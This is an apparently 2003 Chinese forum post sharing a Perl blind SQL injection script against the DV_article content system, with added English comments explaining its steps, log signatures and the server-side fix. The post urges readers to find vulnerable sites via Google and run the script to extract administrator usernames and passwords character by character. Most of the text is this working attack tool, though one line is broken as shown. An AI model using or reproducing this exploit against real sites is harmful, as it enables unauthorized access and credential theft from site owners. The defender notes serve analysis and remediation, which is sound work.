对动网文章系统的过滤不严拿去user 和pass!
[这个贴子最后由豆石在 2003/06/07 08:57am 第 3 次编辑]
漏洞是由pskey 发现
代码来自haowawa.com
本人进行了点小修改。
用google 找下动网文章 ver3.3 之类的 ,就能找到许多用动网文章 做的文章管理系统。
用下面的脚本就可以拿他的 用户和密码
#!/usr/bin/perl
#The script Crack user&pass for DV_article system
#Code by wawa@21cn.com
#Grouppage Http://www.Haowawa.com/
#Homepage Http://wawa.Haowawa.com/
#Modified by 豆石 (1. the check was changed from matching the error feedback to matching the normal-page feedback; 2. the request-submitting subroutine was replaced with different code.)
#
# What this script is: a boolean-based blind SQL injection proof of concept
# against the `id` query parameter of a DV_article list page.  Every request
# appends an AND condition to the id value; the response is then searched
# for the text given as the fourth argument ($riginfo) -- text that appears
# only when the page renders normally, i.e. when the injected condition is
# true.  The per-character loops below reconstruct a row of the `admin`
# table one position at a time from those yes/no answers.
#
# Defender notes:
#  - Root cause (per the post) is that the server-side query is built from
#    the unfiltered `id` parameter.  The fix is server-side: treat id as an
#    integer and use a parameterised query; client-side checks do nothing.
#  - In web-server logs this looks like many sequential requests to one
#    article id whose query string contains `%20AND%20` followed by a
#    `(select ... from admin ...)` subquery.
#
# NOTE(review): no `use strict; use warnings;`, so every variable below is a
# package global; $host, $port, $way, $way1 and $req are shared with the
# subroutines at the bottom of the file through that global scope.
use IO::Socket;
# Number of command-line arguments (array evaluated in scalar context).
$ARGC = @ARGV;
if ($ARGC != 4)
{
print "\n\n";
print "\t* The script Crack user&pass for DV_article system *\n";
print "\n\t Welcom to www.Haowawa.com && www.thysea.com\n";
print "\n\tExample: $0 127.0.0.1 /txt/list.asp 53 \"文章的反馈\"\n";
print "\t $0 \n\n\n";
exit;
}
# @ARGV[0] etc. are one-element array slices; they yield the same value as
# $ARGV[0] but would warn under `use warnings`.
$host = @ARGV[0];      # target host name or IP
$way = @ARGV[1];       # path of the page that takes the `id` parameter
$txtid = @ARGV[2];     # id of an existing article on that page
$riginfo =@ARGV[3];    # text of the normal page; interpolated into a regex unescaped
$port = 80;
print "\n\t* Welcom to http://www.Haowawa.com && http://wawa.haowawa.com *\n";
print "\n\n开始在 $host 上进行测试,请等待......\n";
# Step 1: find the id of the first flagged admin row.  Each candidate
# $adminid is asserted equal to `select min(id) from admin where flag=1`;
# the first candidate for which the normal page comes back is kept.
for ($adminid=1;$adminid<=100;$adminid++)
{
# Query string: id=<txtid> AND <adminid>=(select min(id) from admin where flag=1)
$way1 = "?id=$txtid%20AND%20$adminid=(select%20min(id)%20from%20admin%20where%20flag=1)";
&url;
#@res = &connect;
@res =sendraw($req);
#print @res;
# "@res" joins the response lines with spaces; a match on the normal-page
# text means the injected condition evaluated true.
if ("@res" =~ /$riginfo/)
{
print "\n\t* 发现一管理员ID号为: $adminid \n";
last;
}
}
# If no candidate in 1..100 matched, the loop falls through with
# $adminid == 101 and every later query is issued against that id.
#
# Step 2: find the length of that admin's password (candidates 1..10);
# the injected condition is <passlen>=(select len(password) ...).
for ($passlen=1;$passlen<=10;$passlen++)
{
$way1 = "?id=$txtid%20AND%20$passlen=(select%20len(password)%20from%20admin%20where%20id=$adminid)";
&url;
@res =sendraw($req);
#print @res;
if ("@res" =~ /$riginfo/)
{
print "\n\t* 发现ID=$adminid的管理员的密码长度为: $passlen 位\n";
last;
}
}
# Step 3: same test for the username length (candidates 1..20).
for ($userlen=1;$userlen<=20;$userlen++)
{
$way1 = "?id=$txtid%20AND%20$userlen=(select%20len(username)%20from%20admin%20where%20id=$adminid)";
&url;
@res = sendraw($req);
if ("@res" =~ /$riginfo/)
{
print "\n\t* 发现ID=$adminid的管理员的用户名长度为: $userlen 位\n";
last;
}
}
# Character sets used for the per-position guesses.
@dig=(0..9);
@char=(a..z);          # bareword range; only compiles because strict is off
# Punctuation; inside qw() a backslash only escapes the delimiter or itself.
@tchar=qw(` ~ ! + @ # $ ^ * \( \) _ = - { } [ ] : " ; < > ? | , . / \\);
@dic=(@dig,@char,@tchar);      # order tried for password characters
@dic1=(@char,@dig,@tchar);     # order tried for username characters
print "\n开始尝试获取ID=$adminid的管理员的用户名及密码,请等待......\n";
# Step 4: recover the username one position at a time.  $userdic holds the
# prefix confirmed so far; each candidate character is appended to it and
# the result is compared server-side against mid(username,1,$userlocat).
for ($userlocat=1;$userlocat<=$userlen;$userlocat++)
{
foreach $usertemp(@dic1)
{
$user=$userdic.$usertemp;
# Query string: id=<txtid> AND '<prefix>'=(select mid(username,1,<pos>) from admin where id=<adminid>)
$way1 = "?id=$txtid%20AND%20'$user'=(select%20mid(username,1,$userlocat)%20from%20admin%20where%20id=$adminid)";
#$way1 = "?id=$txtid%20AND%20$adminid=(select%20id%20from%20admin%20where%20left(password,$userlocat)='$user'";
&url;
@res = sendraw($req);
if ("@res" =~ /$riginfo/)
{
# On the final position report the full name.  `last` leaves only the
# inner foreach; the outer for then ends on its own condition.
if ($userlocat==$userlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员名字是: $user\n";last;}
print "\n\t* ID=$adminid的管理员名字的前 $userlocat 位为 $user";
$userdic=$userdic.$usertemp;     # commit the confirmed character
last;
}
}
}
# Step 5: the same procedure for the password column, using @dic and
# accumulating the confirmed prefix in $passdic.
for ($passlocat=1;$passlocat<=$passlen;$passlocat++)
{
foreach $passtemp(@dic)
{
$pass=$passdic.$passtemp;
# Query string: id=<txtid> AND '<prefix>'=(select mid(password,1,<pos>) from admin where id=<adminid>)
$way1 = "?id=$txtid%20AND%20'$pass'=(select%20mid(password,1,$passlocat)%20from%20admin%20where%20id=$adminid)";
&url;
@res = sendraw($req);
if ("@res" =~ /$riginfo/)
{
if ($passlocat==$passlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员密码是: $pass";last;}
print "\n\t* ID=$adminid的管理员密码的前 $passlocat 位为 $pass";
$passdic=$passdic.$passtemp;     # commit the confirmed character
last;
}
}
}
# Final summary.  $user and $pass hold whatever was assigned last in the
# loops above, whether or not that candidate actually matched.
print "\n\n\n\t* 测试完毕. 获取到一个用户名为$user密码为$pass的管理员权限! *\n";
print "\n\n\n";
#thanx rfp's sendraw -- the subroutine below submits one request and collects the response.
# sendraw($request): opens a fresh TCP connection to $host:$port (both
# package globals), writes the raw HTTP request string and returns the
# response lines.  Uses the bareword handle S and a hand-packed sockaddr;
# dies on name resolution, socket creation or connect failure.
sub sendraw {
my ($request) = @_;
my $target;
# inet_aton/PF_INET/SOCK_STREAM come from Socket, which IO::Socket
# re-exports -- presumably why only IO::Socket is loaded above.
$target = inet_aton($host) || die("inet_aton problems");
# The die message below is one string literal spanning two source lines.
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket
problems\n");
# pack "SnA4x8": address family 2 (AF_INET), network-order port, 4-byte
# address, 8 bytes of padding -- a sockaddr_in built by hand.
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);        # make S the default output handle ...
$| = 1;           # ... so this enables autoflush on the socket
print $request;   # goes to S, the currently selected handle
# NOTE(review): this statement is not valid Perl as posted (the right-hand
# side is empty, apparently lost in transcription); the file does not
# compile as shown.
my @res = ;
select(STDOUT);   # restore STDOUT as the default handle
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
# Below: assembles the request that sendraw() will send.
# url(): sets the package global $req to an HTTP/1.0 GET for $way followed
# by the query string $way1, with Host and Referer headers and an empty
# Cookie header.  Takes no arguments (called as `&url;`); reads $way, $way1
# and $host from package scope.  Header lines end in bare "\n".
sub url
{
$req = "GET $way$way1 HTTP/1.0\n".
"Host: $host\n".
"Referer: $host\n".
"Cookie: \n\n";
}